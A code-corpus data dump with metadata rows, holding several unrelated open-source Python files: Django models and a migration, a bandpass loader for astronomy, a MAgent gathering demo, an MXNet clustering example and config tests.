BatchNorm2d_class = BatchNorm2d = torch.nn.BatchNorm2d
relu_inplace = True | 34.166667 | 70 | 0.770732 | 45 | 410 | 6.777778 | 0.533333 | 0.157377 | 0.177049 | 0.209836 | 0.222951 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023055 | 0.153659 | 410 | 12 | 71 | 34.166667 | 0.855908 | 0.136585 | 0 | 0 | 0 | 0 | 0.014164 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.3 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe551b06355686622edde6ba5da6a8305143cb35 | 2,193 | py | Python | ordered_model/tests/models.py | HiddenClever/django-ordered-model | c94709403cfbb35fa4da3d6470ead816096fdec8 | [
"BSD-3-Clause"
] | null | null | null | ordered_model/tests/models.py | HiddenClever/django-ordered-model | c94709403cfbb35fa4da3d6470ead816096fdec8 | [
"BSD-3-Clause"
] | null | null | null | ordered_model/tests/models.py | HiddenClever/django-ordered-model | c94709403cfbb35fa4da3d6470ead816096fdec8 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
from ordered_model.models import OrderedModel, OrderedModelBase
class Item(OrderedModel):
name = models.CharField(max_length=100)
class Question(models.Model):
pass
class TestUser(models.Model):
pass
class Answer(OrderedModel):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='answers')
user = models.ForeignKey(TestUser, on_delete=models.CASCADE, related_name='answers')
order_with_respect_to = ('question', 'user')
class Meta:
ordering = ('question', 'user', 'order')
def __unicode__(self):
return u"Answer #{0:d} of question #{1:d} for user #{2:d}".format(self.order, self.question_id, self.user_id)
class CustomItem(OrderedModel):
id = models.CharField(max_length=100, primary_key=True)
name = models.CharField(max_length=100)
modified = models.DateTimeField(null=True, blank=True)
class CustomOrderFieldModel(OrderedModelBase):
sort_order = models.PositiveIntegerField(editable=False, db_index=True)
name = models.CharField(max_length=100)
order_field_name = 'sort_order'
class Meta:
ordering = ('sort_order',)
class Topping(models.Model):
name = models.CharField(max_length=100)
class Pizza(models.Model):
name = models.CharField(max_length=100)
toppings = models.ManyToManyField(Topping, through='PizzaToppingsThroughModel')
class PizzaToppingsThroughModel(OrderedModel):
pizza = models.ForeignKey(Pizza, on_delete=models.CASCADE)
topping = models.ForeignKey(Topping, on_delete=models.CASCADE)
order_with_respect_to = 'pizza'
class Meta:
ordering = ('pizza', 'order')
class BaseQuestion(OrderedModel):
order_class_path = __module__ + '.BaseQuestion'
question = models.TextField(max_length=100)
class Meta:
ordering = ('order',)
class MultipleChoiceQuestion(BaseQuestion):
good_answer = models.TextField(max_length=100)
wrong_answer1 = models.TextField(max_length=100)
wrong_answer2 = models.TextField(max_length=100)
wrong_answer3 = models.TextField(max_length=100)
class OpenQuestion(BaseQuestion):
answer = models.TextField(max_length=100)
| 29.24 | 117 | 0.735522 | 259 | 2,193 | 6.042471 | 0.301158 | 0.06901 | 0.092013 | 0.092013 | 0.31885 | 0.301597 | 0.174441 | 0.053674 | 0 | 0 | 0 | 0.022642 | 0.154127 | 2,193 | 74 | 118 | 29.635135 | 0.821024 | 0 | 0 | 0.22449 | 0 | 0 | 0.077063 | 0.0114 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0.040816 | 0.040816 | 0.020408 | 0.877551 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
fe56b7b7af27f780f7fa9407871404e8b6436b3d | 1,587 | py | Python | app/services/base.py | grace1307/lan_mapper | 5d244078732b86a2e38a5b21436ffca83c689eeb | [
"MIT"
] | null | null | null | app/services/base.py | grace1307/lan_mapper | 5d244078732b86a2e38a5b21436ffca83c689eeb | [
"MIT"
] | null | null | null | app/services/base.py | grace1307/lan_mapper | 5d244078732b86a2e38a5b21436ffca83c689eeb | [
"MIT"
] | null | null | null | from app.db import db
# Ignore it if db can't find the row when updating/deleting
# Todo: not ignore it, raise some error, remove checkers in view
class BaseService:
__abstract__ = True
model = None
# Create
def add_one(self, **kwargs):
new_row = self.model(**kwargs)
db.session.add(new_row)
db.session.commit() # sqlalchemy auto flushes so maybe this just need commit ?
return new_row
# Read
def select_one(self, id):
return self.model.query.filter(self.model.id == id).one_or_none()
def select_all(self, conditions: list = None, sort_by=None, is_asc=None):
query = db.session.query(self.model)
if conditions is not None:
for condition in conditions:
query = query.filter(condition)
if sort_by is not None and is_asc is not None:
sort_column = self.model.__table__._columns[sort_by]
is_asc = is_asc == 'true'
if sort_column is not None:
query = query.order_by(sort_column.asc() if is_asc else sort_column.desc())
return query.all()
# Update
def update_one(self, id, updated):
row = self.model.query.filter(self.model.id == id)
row_result = row.one_or_none()
if row_result is not None:
row.update(updated)
db.session.commit()
return row.one_or_none()
# Delete
def delete_one(self, id):
row = self.select_one(id)
if row is not None:
db.session.delete(row)
db.session.commit()
| 28.339286 | 91 | 0.609326 | 225 | 1,587 | 4.124444 | 0.328889 | 0.067888 | 0.05819 | 0.038793 | 0.071121 | 0.071121 | 0.071121 | 0.071121 | 0 | 0 | 0 | 0 | 0.297417 | 1,587 | 55 | 92 | 28.854545 | 0.832287 | 0.127914 | 0 | 0.088235 | 0 | 0 | 0.002907 | 0 | 0 | 0 | 0 | 0.018182 | 0 | 1 | 0.147059 | false | 0 | 0.029412 | 0.029412 | 0.382353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe5b28c8c0a814b5544650e3dacd259358d5495e | 4,972 | py | Python | sbpy/photometry/bandpass.py | jianyangli/sbpy | 6b79cbea9bada89207fba17d02dc0c321fa46bf4 | [
"BSD-3-Clause"
] | 1 | 2017-11-28T02:58:51.000Z | 2017-11-28T02:58:51.000Z | sbpy/photometry/bandpass.py | jianyangli/sbpy | 6b79cbea9bada89207fba17d02dc0c321fa46bf4 | [
"BSD-3-Clause"
] | null | null | null | sbpy/photometry/bandpass.py | jianyangli/sbpy | 6b79cbea9bada89207fba17d02dc0c321fa46bf4 | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
sbpy bandpass Module
"""
__all__ = [
'bandpass'
]
import os
from astropy.utils.data import get_pkg_data_filename
def bandpass(name):
"""Retrieve bandpass transmission spectrum from sbpy.
Parameters
----------
name : string
Name of the bandpass, case insensitive. See notes for
available filters.
Returns
-------
bp : `~synphot.SpectralElement`
Notes
-----
Available filters:
+-------------+---------------------------+
| Name | Source |
+=============+===========================+
| 2MASS J | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS H | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS Ks | Cohen et al. 2003 |
+-------------+---------------------------+
| Cousins R | STScI CDBS, v4 |
+-------------+---------------------------+
| Cousins I | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson U | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson B | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson V | STScI CDBS, v4 |
+-------------+---------------------------+
| PS1 g | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 r | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 i | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 w | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 y | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 z | Tonry et al. 2012 |
+-------------+---------------------------+
| SDSS u | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS g | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS r | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS i | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS z | SDSS, dated 2001 |
+-------------+---------------------------+
| WFC3 F438W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WFC3 F606W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WISE W1 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W2 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W3 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W4 | Jarrett et al. 2011 |
+-------------+---------------------------+
References
----------
.. [CDBS] Space Telescope Science Institute. HST Calibration Reference
Data System. https://hst-crds.stsci.edu/ .
.. [COH03] Cohen, M. et al. 2003. Spectral Irradiance Calibration
in the Infrared. XIV. The Absolute Calibration of 2MASS. AJ
126, 1090.
.. [JAR11] Jarrett, T. H. et al. 2011. The Spitzer-WISE Survey of
the Ecliptic Poles. ApJ 735, 112.
.. [SDSS] Sloan Digital Sky Survey. Camera.
www.sdss.org/instruments/camera .
.. [TON12] Tonry, J. L. et al. 2012. The Pan-STARRS1 Photometric
System. ApJ 750, 99.
"""
try:
import synphot
except ImportError:
raise ImportError('synphot is required.')
name2file = {
'2mass j': '2mass-j-rsr.txt',
'2mass h': '2mass-h-rsr.txt',
'2mass ks': '2mass-ks-rsr.txt',
'cousins r': 'cousins_r_004_syn.fits',
'cousins i': 'cousins_i_004_syn.fits',
'johnson u': 'johnson_u_004_syn.fits',
'johnson b': 'johnson_b_004_syn.fits',
'johnson v': 'johnson_v_004_syn.fits',
'ps1 g': 'ps1-gp1.txt',
'ps1 r': 'ps1-rp1.txt',
'ps1 i': 'ps1-ip1.txt',
'ps1 w': 'ps1-wp1.txt',
'ps1 y': 'ps1-yp1.txt',
'ps1 z': 'ps1-zp1.txt',
'sdss u': 'sdss-u.fits',
'sdss g': 'sdss-g.fits',
'sdss r': 'sdss-r.fits',
'sdss i': 'sdss-i.fits',
'sdss z': 'sdss-z.fits',
'wfc3 f438w': 'wfc3_uvis_f438w_004_syn.fits',
'wfc3 f606w': 'wfc3_uvis_f606w_004_syn.fits',
'wise w1': 'WISE-RSR-W1.EE.txt',
'wise w2': 'WISE-RSR-W2.EE.txt',
'wise w3': 'WISE-RSR-W3.EE.txt',
'wise w4': 'WISE-RSR-W4.EE.txt',
}
fn = get_pkg_data_filename(os.path.join(
'..', 'photometry', 'data', name2file[name.lower()]))
bp = synphot.SpectralElement.from_file(fn)
return bp
| 34.054795 | 75 | 0.377715 | 464 | 4,972 | 3.974138 | 0.331897 | 0.034707 | 0.030369 | 0.042299 | 0.093818 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060244 | 0.292237 | 4,972 | 145 | 76 | 34.289655 | 0.463768 | 0.651649 | 0 | 0 | 0 | 0 | 0.444444 | 0.118234 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0.04878 | 0.121951 | 0 | 0.170732 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe5c54cf485f5924948c2f9e92bdf0e6152fda9f | 1,566 | py | Python | teams/migrations/0001_initial.py | Sudani-Coder/teammanager | 857082bc14d7a783d2327b4e982edba7c061f303 | [
"MIT"
] | null | null | null | teams/migrations/0001_initial.py | Sudani-Coder/teammanager | 857082bc14d7a783d2327b4e982edba7c061f303 | [
"MIT"
] | null | null | null | teams/migrations/0001_initial.py | Sudani-Coder/teammanager | 857082bc14d7a783d2327b4e982edba7c061f303 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.2 on 2020-10-18 17:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='GameScore',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_team', models.CharField(max_length=200)),
('second_team', models.CharField(max_length=200)),
('first_team_score', models.IntegerField(default=0)),
('second_team_score', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Player',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('number', models.IntegerField()),
('age', models.IntegerField()),
('position_in_field', models.CharField(choices=[('1', 'حارس'), ('2', 'دفاع'), ('3', 'وسط'), ('4', 'هجوم')], max_length=200)),
],
),
migrations.CreateModel(
name='Team',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, unique=True)),
('details', models.TextField()),
],
),
]
| 36.418605 | 141 | 0.541507 | 151 | 1,566 | 5.470199 | 0.410596 | 0.090799 | 0.072639 | 0.116223 | 0.521792 | 0.521792 | 0.361985 | 0.361985 | 0.361985 | 0.361985 | 0 | 0.032997 | 0.303321 | 1,566 | 42 | 142 | 37.285714 | 0.724106 | 0.028736 | 0 | 0.428571 | 1 | 0 | 0.095458 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.028571 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe5f635d76dff706767d5a4351544f241f8b385b | 3,192 | py | Python | examples/gather_demo.py | mununum/MAgent | 7272cd726182280444597310d52369fac5e13e37 | [
"MIT"
] | 1 | 2021-06-22T10:22:26.000Z | 2021-06-22T10:22:26.000Z | examples/gather_demo.py | mununum/MAgent | 7272cd726182280444597310d52369fac5e13e37 | [
"MIT"
] | null | null | null | examples/gather_demo.py | mununum/MAgent | 7272cd726182280444597310d52369fac5e13e37 | [
"MIT"
] | null | null | null | import random
import magent
from magent.builtin.rule_model import RandomActor
import numpy as np
def init_food(env, food_handle):
tree = np.asarray([[-1,0], [0,0], [0,-1], [0,1], [1,0]])
third = map_size//4 # mapsize includes walls
for i in range(1, 4):
for j in range(1, 4):
base = np.asarray([third*i, third*j])
env.add_agents(food_handle, method="custom", pos=tree+base)
def neigbor_regen_food(env, food_handle, p=0.003):
coords = env.get_pos(food_handle)
rands = np.random.random(len(coords))
for i, pos in enumerate(coords):
if rands[i] > p:
continue
neighbor = np.asarray([[-1,0],[0,-1], [0,1], [1,0]])
regen_pos = [pos+neighbor[np.random.randint(0,4)]]
env.add_agents(food_handle, method="custom",
pos=regen_pos)
if __name__ == "__main__":
gw = magent.gridworld
cfg = gw.Config()
map_size = 25
cfg.set({"map_width": map_size, "map_height": map_size})
agent_group = cfg.add_group(
cfg.register_agent_type(
name="agent",
attr={
'width': 1,
'length': 1,
'view_range': gw.CircleRange(4),
'can_gather': True}))
food_group = cfg.add_group(
cfg.register_agent_type(
"food",
attr={'width': 1,
'length': 1,
'can_be_gathered': True}))
# add reward rule
a = gw.AgentSymbol(agent_group, index='any')
b = gw.AgentSymbol(food_group, index='any')
e = gw.Event(a, 'collide', b)
cfg.add_reward_rule(e, receiver=a, value=1)
# cfg.add_reward_rule(e2, receiver=b, value=1, die=True)
# cfg.add_reward_rule(e3, receiver=[a,b], value=[-1,-1])
env = magent.GridWorld(cfg)
agent_handle, food_handle = env.get_handles()
model1 = RandomActor(env, agent_handle, "up")
env.set_render_dir("build/render")
env.reset()
upstart = [(map_size//2 - 2, map_size//2 - 2), (map_size//2 + 2, map_size//2 - 2),
(map_size//2, map_size//2), (map_size//2 - 2, map_size//2 + 2),
(map_size//2 + 2, map_size//2 + 2)]
# spawnrate = 0.1
env.add_agents(agent_handle, method="custom", pos=upstart)
# env.add_agents(rightgroup, method="custom", pos=rightstart)
init_food(env, food_handle)
k = env.get_observation(agent_handle)
print env.get_pos(agent_handle)
print len(env.get_pos(food_handle))
done = False
step_ct = 0
r_sum = 0
while not done:
obs_1 = env.get_observation(agent_handle)
ids_1 = env.get_agent_id(agent_handle)
acts_1 = model1.infer_action(obs_1, ids_1)
env.set_action(agent_handle, acts_1)
# simulate one step
done = env.step()
# render
env.render()
# get reward
reward = sum(env.get_reward(agent_handle))
r_sum += reward
# clear dead agents
env.clear_dead()
neigbor_regen_food(env, food_handle)
# print info
# if step_ct % 10 == 0:
# print("step %d" % step_ct)
step_ct += 1
if step_ct > 250:
break
print r_sum | 28 | 87 | 0.580201 | 458 | 3,192 | 3.818777 | 0.275109 | 0.056032 | 0.04574 | 0.046312 | 0.284734 | 0.174957 | 0.141795 | 0.129788 | 0.046312 | 0.046312 | 0 | 0.034378 | 0.280075 | 3,192 | 114 | 88 | 28 | 0.726719 | 0.107143 | 0 | 0.053333 | 0 | 0 | 0.048643 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.053333 | null | null | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe6407132244604eabc2321eb05eb24333b3bd82 | 669 | py | Python | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | import pandas as pd, numpy as np
from sklearn.preprocessing import OneHotEncoder
author_int_dict = {'EAP':0,'HPL':1,'MWS':2}
def load_train_test_data (num_samples=None):
train_data = pd.read_csv('../data/train.csv')
train_data['author'] = [author_int_dict[a] for a in train_data['author'].tolist()]
test_data = pd.read_csv('../data/test.csv')
return train_data[:num_samples],test_data[:num_samples]
def categorical_labeler (labels):
labels = labels.reshape(-1, 1)
#labels = OneHotEncoder().fit_transform(labels).todense()
labels = np.array(labels, dtype=np.int64)
return labels
if __name__ == '__main__':
pass | 33.45 | 87 | 0.689088 | 96 | 669 | 4.510417 | 0.5 | 0.083141 | 0.096998 | 0.083141 | 0.078522 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012567 | 0.167414 | 669 | 20 | 88 | 33.45 | 0.764811 | 0.083707 | 0 | 0 | 0 | 0 | 0.104377 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.071429 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
fe64404bf937356d7de814318a6e0bdf49ea36b3 | 6,987 | py | Python | example/dec/dec.py | TheBurningCrusade/A_mxnet | fa2a8e3c438bea16b993e9537f75e2082d83346f | [
"Apache-2.0"
] | 159 | 2016-08-23T22:13:26.000Z | 2021-10-24T01:31:35.000Z | example/dec/dec.py | mrgloom/FaceDetection-ConvNet-3D | f9251c48eb40c5aec8fba7455115c355466555be | [
"Apache-2.0"
] | 10 | 2016-08-23T05:59:07.000Z | 2018-05-24T02:31:41.000Z | example/dec/dec.py | mrgloom/FaceDetection-ConvNet-3D | f9251c48eb40c5aec8fba7455115c355466555be | [
"Apache-2.0"
] | 77 | 2016-08-21T00:35:00.000Z | 2021-06-01T05:03:34.000Z | # pylint: skip-file
import sys
import os
# code to automatically download dataset
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path = [os.path.join(curr_path, "../autoencoder")] + sys.path
import mxnet as mx
import numpy as np
import data
from scipy.spatial.distance import cdist
from sklearn.cluster import KMeans
import model
from autoencoder import AutoEncoderModel
from solver import Solver, Monitor
import logging
def cluster_acc(Y_pred, Y):
from sklearn.utils.linear_assignment_ import linear_assignment
assert Y_pred.size == Y.size
D = max(Y_pred.max(), Y.max())+1
w = np.zeros((D,D), dtype=np.int64)
for i in range(Y_pred.size):
w[Y_pred[i], Y[i]] += 1
ind = linear_assignment(w.max() - w)
return sum([w[i,j] for i,j in ind])*1.0/Y_pred.size, w
class DECModel(model.MXModel):
class DECLoss(mx.operator.NumpyOp):
def __init__(self, num_centers, alpha):
super(DECModel.DECLoss, self).__init__(need_top_grad=False)
self.num_centers = num_centers
self.alpha = alpha
def forward(self, in_data, out_data):
z = in_data[0]
mu = in_data[1]
q = out_data[0]
self.mask = 1.0/(1.0+cdist(z, mu)**2/self.alpha)
q[:] = self.mask**((self.alpha+1.0)/2.0)
q[:] = (q.T/q.sum(axis=1)).T
def backward(self, out_grad, in_data, out_data, in_grad):
q = out_data[0]
z = in_data[0]
mu = in_data[1]
p = in_data[2]
dz = in_grad[0]
dmu = in_grad[1]
self.mask *= (self.alpha+1.0)/self.alpha*(p-q)
dz[:] = (z.T*self.mask.sum(axis=1)).T - self.mask.dot(mu)
dmu[:] = (mu.T*self.mask.sum(axis=0)).T - self.mask.T.dot(z)
def infer_shape(self, in_shape):
assert len(in_shape) == 3
assert len(in_shape[0]) == 2
input_shape = in_shape[0]
label_shape = (input_shape[0], self.num_centers)
mu_shape = (self.num_centers, input_shape[1])
out_shape = (input_shape[0], self.num_centers)
return [input_shape, mu_shape, label_shape], [out_shape]
def list_arguments(self):
return ['data', 'mu', 'label']
def setup(self, X, num_centers, alpha, save_to='dec_model'):
sep = X.shape[0]*9/10
X_train = X[:sep]
X_val = X[sep:]
ae_model = AutoEncoderModel(self.xpu, [X.shape[1],500,500,2000,10], pt_dropout=0.2)
if not os.path.exists(save_to+'_pt.arg'):
ae_model.layerwise_pretrain(X_train, 256, 50000, 'sgd', l_rate=0.1, decay=0.0,
lr_scheduler=mx.misc.FactorScheduler(20000,0.1))
ae_model.finetune(X_train, 256, 100000, 'sgd', l_rate=0.1, decay=0.0,
lr_scheduler=mx.misc.FactorScheduler(20000,0.1))
ae_model.save(save_to+'_pt.arg')
logging.log(logging.INFO, "Autoencoder Training error: %f"%ae_model.eval(X_train))
logging.log(logging.INFO, "Autoencoder Validation error: %f"%ae_model.eval(X_val))
else:
ae_model.load(save_to+'_pt.arg')
self.ae_model = ae_model
self.dec_op = DECModel.DECLoss(num_centers, alpha)
label = mx.sym.Variable('label')
self.feature = self.ae_model.encoder
self.loss = self.dec_op(data=self.ae_model.encoder, label=label, name='dec')
self.args.update({k:v for k,v in self.ae_model.args.items() if k in self.ae_model.encoder.list_arguments()})
self.args['dec_mu'] = mx.nd.empty((num_centers, self.ae_model.dims[-1]), ctx=self.xpu)
self.args_grad.update({k: mx.nd.empty(v.shape, ctx=self.xpu) for k,v in self.args.items()})
self.args_mult.update({k: k.endswith('bias') and 2.0 or 1.0 for k in self.args})
self.num_centers = num_centers
def cluster(self, X, y=None, update_interval=None):
N = X.shape[0]
if not update_interval:
update_interval = N
batch_size = 256
test_iter = mx.io.NDArrayIter({'data': X}, batch_size=batch_size, shuffle=False,
last_batch_handle='pad')
args = {k: mx.nd.array(v.asnumpy(), ctx=self.xpu) for k, v in self.args.items()}
z = model.extract_feature(self.feature, args, test_iter, N, self.xpu).values()[0]
kmeans = KMeans(self.num_centers, n_init=20)
kmeans.fit(z)
args['dec_mu'][:] = kmeans.cluster_centers_
solver = Solver('sgd', momentum=0.9, wd=0.0, learning_rate=0.01)
def ce(label, pred):
return np.sum(label*np.log(label/(pred+0.000001)))/label.shape[0]
solver.set_metric(mx.metric.CustomMetric(ce))
label_buff = np.zeros((X.shape[0], self.num_centers))
train_iter = mx.io.NDArrayIter({'data': X}, {'label': label_buff}, batch_size=batch_size,
shuffle=False, last_batch_handle='roll_over')
self.y_pred = np.zeros((X.shape[0]))
def refresh(i):
if i%update_interval == 0:
z = model.extract_feature(self.feature, args, test_iter, N, self.xpu).values()[0]
p = np.zeros((z.shape[0], self.num_centers))
self.dec_op.forward([z, args['dec_mu'].asnumpy()], [p])
y_pred = p.argmax(axis=1)
print np.std(np.bincount(y_pred)), np.bincount(y_pred)
print np.std(np.bincount(y.astype(np.int))), np.bincount(y.astype(np.int))
if y is not None:
print(cluster_acc(y_pred, y)[0])
weight = 1.0/p.sum(axis=0)
weight *= self.num_centers/weight.sum()
p = (p**2)*weight
train_iter.data_list[1][:] = (p.T/p.sum(axis=1)).T
print np.sum(y_pred != self.y_pred), 0.001*y_pred.shape[0]
if np.sum(y_pred != self.y_pred) < 0.001*y_pred.shape[0]:
self.y_pred = y_pred
return True
self.y_pred = y_pred
solver.set_iter_start_callback(refresh)
solver.set_monitor(Monitor(50))
solver.solve(self.xpu, self.loss, args, self.args_grad,
train_iter, 0, 1000000000, {}, False)
self.end_args = args
if y is not None:
return cluster_acc(self.y_pred, y)[0]
else:
return -1
def mnist_exp(xpu):
X, Y = data.get_mnist()
dec_model = DECModel(xpu, X, 10, 1.0, 'data/mnist')
acc = []
for i in [10*(2**j) for j in range(9)]:
acc.append(dec_model.cluster(X, Y, i))
logging.log(logging.INFO, 'Clustering Acc: %f at update interval: %d'%(acc[-1], i))
logging.info(str(acc))
logging.info('Best Clustering ACC: %f at update_interval: %d'%(np.max(acc), 10*(2**np.argmax(acc))))
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
mnist_exp(mx.gpu(0))
| 44.788462 | 116 | 0.586232 | 1,067 | 6,987 | 3.665417 | 0.208997 | 0.028126 | 0.035796 | 0.013296 | 0.284838 | 0.207875 | 0.157504 | 0.12631 | 0.117617 | 0.094605 | 0 | 0.033561 | 0.266495 | 6,987 | 156 | 117 | 44.788462 | 0.729561 | 0.008015 | 0 | 0.128571 | 0 | 0 | 0.041276 | 0 | 0 | 0 | 0 | 0 | 0.021429 | 0 | null | null | 0 | 0.085714 | null | null | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe6806edfc8769087714d9060a7456450c7a5f90 | 1,608 | py | Python | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | null | null | null | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | 2 | 2022-02-05T12:15:03.000Z | 2022-03-27T09:55:51.000Z | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | null | null | null | from pytest import raises
from datek_app_utils.env_config.base import BaseConfig
from datek_app_utils.env_config.errors import InstantiationForbiddenError
class SomeOtherMixinWhichDoesntRelateToEnvConfig:
color = "red"
class TestConfig:
def test_iter(self, monkeypatch, key_volume, base_config_class):
volume = 5
monkeypatch.setenv(key_volume, str(volume))
class Config(SomeOtherMixinWhichDoesntRelateToEnvConfig, base_config_class):
TYPE: str
items = [item for item in Config]
assert len(items) == 5
assert Config.color == "red"
assert items[0].name == "TYPE"
assert items[0].value is None
assert items[0].type == str
assert items[1].name == "FIELD_WITH_DEFAULT_VALUE"
assert items[1].value == "C"
assert items[1].type == str
assert items[2].name == "NON_MANDATORY_FIELD"
assert items[2].value is None
assert items[2].type == str
assert items[3].name == "TYPED_NON_MANDATORY_FIELD"
assert items[3].value is None
assert items[3].type == str
assert items[4].name == "VOLUME"
assert items[4].value == volume
assert items[4].type == int
def test_get(self, monkeypatch, key_volume, base_config_class):
volume = 10
monkeypatch.setenv(key_volume, str(volume))
assert getattr(base_config_class, "VOLUME") == volume
def test_constructor_is_forbidden(self):
class Config(BaseConfig):
pass
with raises(InstantiationForbiddenError):
Config()
| 28.714286 | 84 | 0.651741 | 193 | 1,608 | 5.26943 | 0.300518 | 0.162242 | 0.058997 | 0.070796 | 0.328417 | 0.208456 | 0.088496 | 0.088496 | 0 | 0 | 0 | 0.015847 | 0.254353 | 1,608 | 55 | 85 | 29.236364 | 0.83236 | 0 | 0 | 0.052632 | 0 | 0 | 0.056592 | 0.030473 | 0 | 0 | 0 | 0 | 0.473684 | 1 | 0.078947 | false | 0.026316 | 0.078947 | 0 | 0.289474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
